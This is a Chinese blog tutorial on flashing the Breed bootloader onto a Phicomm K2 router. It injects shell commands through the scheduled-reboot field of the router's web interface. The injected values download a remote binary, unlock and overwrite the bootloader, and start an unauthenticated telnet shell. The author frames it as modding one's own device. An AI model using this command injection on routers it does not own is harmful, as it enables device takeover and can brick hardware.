专注于分享seo思维和sem网络营销的园林绿化SEO博客
顶部右侧自定义文字
aliyun-1212-large.jpg
aliyun-1212-large.jpg

网站首页 网站运营 正文

斐迅K2 A6 V22.4.6.3用web漏洞成功刷入breed简单易行

2017-05-01 网站运营 5537 ℃ 0 评论
广告位 后台主题配置管理

昨天刚买的,版本A6 V22.4.6.3 一键刷机已经封了。
提醒:伸手党和喷粪族绕行,我成功了,不代表你可以行,也许我是侥幸呢,不对由此带来的后果负责!
看到论坛里有大神,帮忙免费生成mac加密配置文件。也发给他了,可能忙回复慢,我等不及谷歌了一下web漏洞的方法很简单,代码执行完即可需要一个chrome浏览器,斐迅路由器联网。
1.点击右上角的电源按钮,选择定时重启
2.点击启用定时功能
3.按F12(最新版的固件F12都禁止了,可以使用chrome的选项点击“更多工具”-》“开发者工具”)
4.在Console里面黏贴下面的语句,每次输入一条然后按enter键

$("#timerebootmin").val("05 | wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin")
$("#timeRebootSave").click()
$("#timerebootmin").val("05 | mtd unlock Bootloader")
$("#timeRebootSave").click()
$("#timerebootmin").val("05 | mtd write breed-mt7620-phicomm-psg1208.bin Bootloader")
$("#timeRebootSave").click()

5.重启路由
6.按住reset键,插入电源,等待3秒,可能更长时间,路由器lan口网线连接到电脑,打开到192.168.1.1,可以看到breed恢复控制台


以上方法来自网络,亲测成功,但不对由此带来的后果负责。

另外亲测可以利用上面的方法,开启原来固件的telnet功能。代码如下 方法同上每次一条然后回车。
$("#timerebootmin").val("05 | /usr/sbin/telnetd -l /bin/login.sh")
$("#timeRebootSave").click()
另:今天另一台k2 A6  V22.4.6.3 思考了一下用下面的方法刷的breed成功,抛砖引玉。
提醒:不对此承担责任,后果自负,用不用自便,别喷fen
先开telnet然后登录后命令行下刷。
具体,先通过谷歌浏览器利用web漏洞开telnet
$("#timerebootmin").val("05 | /usr/sbin/telnetd -l /bin/login.sh")
$("#timeRebootSave").click()

然后通过telnet 192.168.2.1 登录 依此运行下面的红色命令
切换目录到tmp
cd /tmp  
下载breed,可以直观看到下载进程
wget http://breed.hackpascal.net/breed-mt7620-phicomm-psg1208.bin
解锁
mtd unlock Bootloader
写breed到引导区。
mtd write breed-mt7620-phicomm-psg1208.bin Bootloader
好了,刷breed成功。感觉比上面的直观些。

Tags:

请在这里放置你的在线分享代码
广告位 后台主题配置管理

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

«    2024年1月    »
1234567
891011121314
15161718192021
22232425262728
293031
标签列表
aliyun-1212-large.jpg